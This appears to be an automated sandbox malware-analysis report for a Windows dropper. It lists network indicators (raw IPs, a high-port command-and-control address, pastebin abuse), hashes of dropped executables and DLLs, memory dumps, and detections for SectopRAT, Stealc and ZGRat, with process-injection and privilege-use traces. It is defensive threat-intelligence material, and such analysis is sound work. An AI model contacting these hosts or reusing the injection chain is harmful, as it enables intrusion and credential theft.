DE 185.172.128.90:80 185.172.128.90 tcp
NL 108.156.61.210:443 dsepc5ud74wta.cloudfront.net tcp
US 8.8.8.8:53 240216234727901.mjj.xne26.cfd udp
BG 94.156.35.76:80 240216234727901.mjj.xne26.cfd tcp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 note.padd.cn.com udp
RO 176.97.76.106:80 note.padd.cn.com tcp
DE 185.172.128.76:80 185.172.128.76 tcp
US 8.8.8.8:53 dsepc5ud74wta.cloudfront.net udp
NL 108.156.61.210:443 dsepc5ud74wta.cloudfront.net tcp
US 8.8.8.8:53 monoblocked.com udp
RU 45.130.41.108:443 monoblocked.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.190.80:80 apps.identrust.com tcp
US 8.8.8.8:53 c.574859385.xyz udp
GB 37.221.125.202:443 c.574859385.xyz tcp
GB 37.221.125.202:443 c.574859385.xyz tcp
DE 185.172.128.228:80 185.172.128.228 tcp
RU 91.215.85.66:15647 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 pki.goog udp
US 216.239.32.29:80 pki.goog tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 download.iolo.net udp
FR 185.93.2.244:80 download.iolo.net tcp
RU 91.215.85.66:15647 tcp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp

Files

\Users\Admin\AppData\Local\Temp\nst199A.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Tar2295.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 cdff232ba5f19245cb3051dbe343475b
SHA1 48c9413b74bde37f3bf74dd0f807bbf21b019bba
SHA256 9d6f08844e37d68931921fa518a4bf2af370d581d15a79609f463facfe768ab0
SHA512 dd03485119dbe18414ccaf9185759e7a6f1c9d942753a573900797c2d74c77c53608ac51773c0d4d4de02d41e2ea357900e703521431a80b48993696d8cd7ea9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 52176d063dcdb67592736cd7a6edec07
SHA1 de9775a58899fb218fc38981f5b082b7e8e5f5fc
SHA256 9fb136831780e33c6a600022072fca50448ac1e123224294213dade48489624a
SHA512 c8c56484277122d003044522b28cde8a9c7cd183e4ee4618db8cb1491bfcd6f05e0cf8abe73ef0c5678e2e67a327059dbe4490659b76de15e509a40eec7c1372

C:\Users\Admin\AppData\Local\Temp\nst199A.tmp\load.bat

MD5 c03b3682569c40524152ba0ea7bc25ff
SHA1 670c137c03ade8b573e4084c12dcb1d00e377c20
SHA256 70e43edb60c75270e41a167cfc5e6c1b60a0d022b57812560006626c3904353f
SHA512 9b0f33cf044beb3a9f558e8a09f99b263c2b617169fa036876043b5e85a92eb5f0a2ed31accad878486dfdaa144f8b780ea14378ac2e0d3b273cf6100515019a

memory/1072-168-0x0000000073C50000-0x00000000741FB000-memory.dmp

memory/1072-169-0x0000000073C50000-0x00000000741FB000-memory.dmp

memory/1072-172-0x0000000002AF0000-0x0000000002B30000-memory.dmp

memory/1072-171-0x0000000002AF0000-0x0000000002B30000-memory.dmp

memory/1072-170-0x0000000002AF0000-0x0000000002B30000-memory.dmp

memory/1072-173-0x0000000073C50000-0x00000000741FB000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 ac1b1bc5a0cadb408afba338d153f087
SHA1 c7e6145baa89ea358d5bc9456570645d0193a833
SHA256 ea37e030af3674aeaa393a3cbc8a8a3e1b2b564e28bf00c644f84e010cc86e3f
SHA512 7f2d9b03d2ab2ee3c8ec89ad07dfc237737e24195c67f42b9c71e5cdebe1d71e0162ddf0372bbc48352320f73fed61b86d7339f8cef4b0668fe57f23d8c609fe

memory/476-179-0x00000000736A0000-0x0000000073C4B000-memory.dmp

memory/476-180-0x0000000002D20000-0x0000000002D60000-memory.dmp

memory/476-181-0x00000000736A0000-0x0000000073C4B000-memory.dmp

memory/476-183-0x00000000736A0000-0x0000000073C4B000-memory.dmp

\Users\Admin\AppData\Local\Temp\i1.exe

MD5 ae73eb4cbe39e4a9e28a367331329a12
SHA1 fa827d6b4f9c94dd137fc24b201259a4c8293913
SHA256 5f302f2c568cfc3bef4f7690b84d15dd58caace21a60f76d807e909ff8f81e5e
SHA512 b8b28158002cdd797cfe9050d93ba7d3122ac9a6e308d60c13027546bcfde0fa17df38e980016c6bb91fec62b2b6a9acfc55b58a5983e2beab248aac469a9500

memory/1860-188-0x0000000004200000-0x0000000004300000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1860-190-0x0000000000230000-0x000000000029D000-memory.dmp

memory/352-196-0x0000000073C50000-0x00000000741FB000-memory.dmp

memory/352-197-0x0000000001FF0000-0x0000000002030000-memory.dmp

memory/352-198-0x0000000073C50000-0x00000000741FB000-memory.dmp

memory/352-199-0x0000000001FF0000-0x0000000002030000-memory.dmp

memory/352-200-0x0000000073C50000-0x00000000741FB000-memory.dmp

memory/2668-211-0x0000000002440000-0x0000000002441000-memory.dmp

\Users\Admin\AppData\Local\Temp\u1fo.0.exe

MD5 80e0fece33768e20034d106db0d36341
SHA1 ba12ccea1e640cdb5fedb0e9ac03aad09bdc9510
SHA256 8a6721d38d828ce4dbbef786174faf854f366b0bf6f07189033aafa53459a14e
SHA512 1292b73f6e0673a118ad726ab14dbcbbbe9d1245cac978e5752838b51cccabd4a286397faf7de27b98cd9ab88ea04fb46aa02ec3287d641b3056593f69606e7f

memory/1172-232-0x0000000004480000-0x0000000004580000-memory.dmp

memory/1172-233-0x0000000000220000-0x0000000000247000-memory.dmp

memory/1172-234-0x0000000000400000-0x000000000403C000-memory.dmp

memory/1688-243-0x00000000736A0000-0x0000000073C4B000-memory.dmp

memory/1688-244-0x0000000002A10000-0x0000000002A50000-memory.dmp

memory/1688-245-0x00000000736A0000-0x0000000073C4B000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fa5db95986bb9c7001ae113d70b3ae47
SHA1 589674e9127078d5ebbb8223ffb32ed66e422c1b
SHA256 0218489b7290909764e3cd262440af40bc99c56528bbc27d7f47ae9d7b0e576e
SHA512 49c3978137f41572a288806e209f8f806c296f11aba181accd2667a79e6c132d0277f2fcd08fa6047258958f927eee1262e5cbadfc372199bcd3b29d9325af78

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8a122a410326772e8f82875b217ebb1f
SHA1 7444ffdb59b0df6eba061740b6ae3d0bafaa3a4e
SHA256 bb3d7f0e516db8a5248e39e7aee3bc898736d6b3a7d9f02d7ce7af5d75c401b6
SHA512 cb8731b4f10c71780da9043c204b8f83850c961ed065cb51fbcf5c5d6821d55335d446d2feee2e7bdf3206f8964835412aac808c6397b54a77f683fcc2b2344d

memory/1860-321-0x0000000000400000-0x000000000405F000-memory.dmp

memory/1688-322-0x00000000736A0000-0x0000000073C4B000-memory.dmp

memory/1860-342-0x0000000004200000-0x0000000004300000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\U1FO1~1.ZIP

MD5 78d3ca6355c93c72b494bb6a498bf639
SHA1 2fa4e5df74bfe75c207c881a1b0d3bc1c62c8b0e
SHA256 a1dd547a63b256aa6a16871ed03f8b025226f7617e67b8817a08444df077b001
SHA512 1b2df7bee2514aee7efd3579f5dd33c76b40606d07dba69a34c45747662fad61174db4931bca02b058830107959205e889fee74f8ccc9f6e03f9fd111761f4ea

\Users\Admin\AppData\Local\Temp\u1fo.2\run.exe

MD5 9fb4770ced09aae3b437c1c6eb6d7334
SHA1 fe54b31b0db8665aa5b22bed147e8295afc88a03
SHA256 a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3
SHA512 140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256

C:\Users\Admin\AppData\Local\Temp\u1fo.2\relay.dll

MD5 10d51becd0bbce0fab147ff9658c565e
SHA1 4689a18112ff876d3c066bc8c14a08fd6b7b7a4a
SHA256 7b2db9c88f60ed6dd24b1dec321a304564780fdb191a96ec35c051856128f1ed
SHA512 29faf493bb28f7842c905adc5312f31741effb09f841059b53d73b22aea2c4d41d73db10bbf37703d6aeb936ffacbc756a3cc85ba3c0b6a6863ef4d27fefcd29

C:\Users\Admin\AppData\Local\Temp\u1fo.2\whale.dbf

MD5 a723bf46048e0bfb15b8d77d7a648c3e
SHA1 8952d3c34e9341e4425571e10f22b782695bb915
SHA256 b440170853bdb43b66497f701aee2901080326975140b095a1669cb9dee13422
SHA512 ca8ea2f7f3c7af21b5673a0a3f2611b6580a7ed02efa2cfd8b343eb644ff09682bde43b25ef7aab68530d5ce31dcbd252c382dd336ecb610d4c4ebde78347273

C:\Users\Admin\AppData\Local\Temp\u1fo.2\bunch.dat

MD5 1e8237d3028ab52821d69099e0954f97
SHA1 30a6ae353adda0c471c6ed5b7a2458b07185abf2
SHA256 9387488f9d338e211be2cb45109bf590a5070180bc0d4a703f70d3cb3c4e1742
SHA512 a6406d7c18694ee014d59df581f1f76e980b68e3361ae680dc979606a423eba48d35e37f143154dd97fe5f066baf0ea51a2e9f8bc822d593e1cba70ead6559f3

memory/2036-432-0x00000000747C0000-0x0000000074934000-memory.dmp

memory/2036-433-0x0000000077C10000-0x0000000077DB9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u1fo.2\UIxMarketPlugin.dll

MD5 d1ba9412e78bfc98074c5d724a1a87d6
SHA1 0572f98d78fb0b366b5a086c2a74cc68b771d368
SHA256 cbcea8f28d8916219d1e8b0a8ca2db17e338eb812431bc4ad0cb36c06fd67f15
SHA512 8765de36d3824b12c0a4478c31b985878d4811bd0e5b6fba4ea07f8c76340bd66a2da3490d4871b95d9a12f96efc25507dfd87f431de211664dbe9a9c914af6f

memory/2036-439-0x00000000747C0000-0x0000000074934000-memory.dmp

memory/1860-440-0x0000000000400000-0x000000000405F000-memory.dmp

memory/2036-441-0x00000000747C0000-0x0000000074934000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4e41388c

MD5 a3f64b0f4425cccfbe71b41931a1a3f4
SHA1 2fb9d9470c2e1052c226fcf2f2c06e7f35e3105c
SHA256 8d9a9385fc6af4cbba1ec2c2f07986200c88d5b038519ab08d234f48e2901ec3
SHA512 070a370f78fd432edc20f9bdb096f9522f716713b2d08e38389518043b4705f665aa7be34caedf8feaf8a475e1454bf8f4acb6c8f0ce90e3d793b248b9467d3a

memory/636-443-0x00000000747C0000-0x0000000074934000-memory.dmp

memory/636-445-0x0000000077C10000-0x0000000077DB9000-memory.dmp

memory/636-492-0x00000000747C0000-0x0000000074934000-memory.dmp

memory/636-493-0x00000000747C0000-0x0000000074934000-memory.dmp

memory/636-497-0x00000000747C0000-0x0000000074934000-memory.dmp

memory/2380-498-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2380-495-0x0000000073190000-0x00000000741F2000-memory.dmp

memory/2380-499-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2380-500-0x0000000000400000-0x00000000004C6000-memory.dmp

memory/2380-501-0x0000000072AA0000-0x000000007318E000-memory.dmp

memory/2380-502-0x0000000004CD0000-0x0000000004D10000-memory.dmp

memory/2380-505-0x0000000072AA0000-0x000000007318E000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e82ed9131ad46b9025ff978fef4abd59
SHA1 8c68caa63d85144b4ff660e3a7b48f8865dd17e9
SHA256 ccb90805ec961324e7f29e4a1fce8649f757d7e69dbaf4a99b0b9fbbecb64473
SHA512 af55eedfaf9a2cbe1f6438881ba1553b8267574d49768fcd9ee5ff0a2a1cc828f023f681af62746ac66a16fa28416a3f93239e1bae9861cb1d00681d6bea1270

memory/2380-526-0x0000000004CD0000-0x0000000004D10000-memory.dmp

\Users\Admin\AppData\Local\Temp\u1fo.3.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/1860-544-0x0000000004200000-0x0000000004300000-memory.dmp

memory/1860-543-0x0000000000400000-0x000000000405F000-memory.dmp

memory/2464-545-0x0000000000230000-0x0000000000231000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 b7b3e8a8a18b027b4333feba64524a0a
SHA1 b55d040f683077b446c098bc87e320cde0d82a7a
SHA256 4877aaefb31817035e386aaa6d0550e4cd0a1a331f694dd0ffbb32a106389f34
SHA512 1c7358c1aab01eb891b078ac3d796600009fe0c47c7315a68b064af29bd2d82e1093f8829b23a0ee968ccad558916d2c74f77bfd2cc34149ef25f8ea75c0b561

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 3668218f4409c4ca5543d108ed16ed29
SHA1 88670b8be52cc341c721dd62b7ad36333fd37c5f
SHA256 a1f26152bdb5109ebac832e81c6a1491edec58dfea5af7bf5cc2942b5119a985
SHA512 05606270baa6655418df48f28b139a24be9caaf6ff5ed69e47f4431669064e895a3297a8a67b24650adfc750ad37d7567241dabe268352615fe21f678e4b612b

memory/2464-580-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/812-582-0x000007FEF5E90000-0x000007FEF687C000-memory.dmp

memory/812-583-0x0000000001070000-0x0000000004968000-memory.dmp

memory/812-584-0x000000001EB20000-0x000000001EBA0000-memory.dmp

memory/812-585-0x000000001ED20000-0x000000001EE30000-memory.dmp

memory/812-586-0x00000000007C0000-0x00000000007D0000-memory.dmp

memory/812-587-0x0000000000A80000-0x0000000000A8C000-memory.dmp

memory/812-588-0x00000000007D0000-0x00000000007E4000-memory.dmp

memory/812-589-0x0000000000CE0000-0x0000000000D04000-memory.dmp

memory/812-590-0x0000000001060000-0x000000000106A000-memory.dmp

memory/812-591-0x000000001E530000-0x000000001E55A000-memory.dmp

memory/812-592-0x000000001F710000-0x000000001F7C2000-memory.dmp

memory/812-593-0x0000000000B10000-0x0000000000B8A000-memory.dmp

memory/812-594-0x0000000000E90000-0x0000000000EF2000-memory.dmp

memory/812-595-0x0000000000560000-0x000000000056A000-memory.dmp

memory/812-599-0x000000001FDD0000-0x00000000200D0000-memory.dmp

memory/812-601-0x0000000000580000-0x000000000058A000-memory.dmp

memory/812-602-0x000000001EB20000-0x000000001EBA0000-memory.dmp

memory/812-603-0x000000001EB20000-0x000000001EBA0000-memory.dmp

memory/812-604-0x0000000000CC0000-0x0000000000CCA000-memory.dmp

memory/812-605-0x000000001E5B0000-0x000000001E5D2000-memory.dmp

memory/812-609-0x000000001EB20000-0x000000001EBA0000-memory.dmp

memory/812-608-0x0000000000CD0000-0x0000000000CDC000-memory.dmp

memory/812-613-0x000007FEF5E90000-0x000007FEF687C000-memory.dmp

memory/812-614-0x000000001EB20000-0x000000001EBA0000-memory.dmp

memory/812-616-0x0000000000580000-0x000000000058A000-memory.dmp

memory/812-615-0x0000000000580000-0x000000000058A000-memory.dmp

memory/812-617-0x000000001EB20000-0x000000001EBA0000-memory.dmp

memory/812-618-0x000000001EB20000-0x000000001EBA0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\a156d2ee87eeb3012aacff4fcc5518f7fa0b2caa0b97ad5a5e46c2e4fdf8c5f4\53c051f1d10c489198d14bef4e290887.tmp

MD5 9810559e8ca9cb1e9e1a5222797b7def
SHA1 0f244940a3f4df18b02a9064f264c8e203cbf885
SHA256 7d64187cf73ba0fbf6b691c8dca9f7eb52b557c7da23ecb96f5823189e389955
SHA512 dda14e433941d72ce88765066159ceb053a7da92ace08dd35dbd9d3ccefda4b9a651c8f42483689e2c49ede3499eb0d8d24f8d60f16675ea0694bb98a3e93ea1

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-26 09:05

Reported

2024-04-26 09:08

Platform

win10v2004-20240412-en

Max time kernel

149s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Stealc

stealer stealc

ZGRat

rat zgrat

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\i1.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3652 set thread context of 4836 N/A C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 4836 set thread context of 4984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u1p4.3.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u1p4.2\run.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2224 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 2224 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 2224 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\cmd.exe
PID 2628 wrote to memory of 1732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 1732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 1732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 4384 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 4384 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 4384 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 2200 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2628 wrote to memory of 2200 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2628 wrote to memory of 2200 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2628 wrote to memory of 1120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 1120 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
